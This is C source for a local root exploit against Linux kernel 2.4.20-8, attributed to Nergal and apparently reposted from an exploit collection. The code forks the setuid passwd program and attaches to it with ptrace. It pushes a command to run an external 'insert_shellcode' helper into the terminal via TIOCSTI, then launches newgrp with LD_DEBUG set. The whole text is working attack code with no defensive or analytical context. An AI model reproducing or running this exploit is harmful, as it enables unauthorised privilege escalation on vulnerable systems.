Linux l 2.4.20-8 # 溢出
/* by Nergal */ #include <stdio.h> #include <sys/ptrace.h> #include <fcntl.h> #include <sys/ioctl.h> void ex_passwd(int fd) { char z; if (read(fd, &z, 1) <= 0) { perror("read:"); exit(1); } execl("/usr/bin/passwd", "passwd", 0); perror("execl"); exit(1); } void insert(int pid) { char buf[100]; char *ptr = buf; sprintf(buf, "exec ./insert_shellcode %i\n", pid); while (*ptr && !ioctl(0, TIOCSTI, ptr++)); } main(int argc, char **argv) { int res, fifo; int status; int pid, n; int pipa[2]; char buf[1024]; pipe(pipa); switch (pid = fork()) { case -1: perror("fork"); exit(1); case 0: close(pipa[1]); ex_passwd(pipa[0]); default:; } res = ptrace(PTRACE_ATTACH, pid, 0, 0); if (res) { perror("attach"); exit(1); } res = waitpid(-1, &status, 0); if (res == -1) { perror("waitpid"); exit(1); } res = ptrace(PTRACE_CONT, pid, 0, 0); if (res) { perror("cont"); exit(1); } fprintf(stderr, "attached\n"); switch (fork()) { case -1: perror("fork"); exit(1); case 0: close(pipa[1]); sleep(1); insert(pid); do { n = read(pipa[0], buf, sizeof(buf)); } while (n > 0); if (n < 0) perror("read"); exit(0); default:; } close(pipa[0]); dup2(pipa[1], 2); close(pipa[1]); /* Decrystallizing reason */ setenv("LD_DEBUG", "libs", 1); /* With strength I burn */ execl("/usr/bin/newgrp", "newgrp", 0);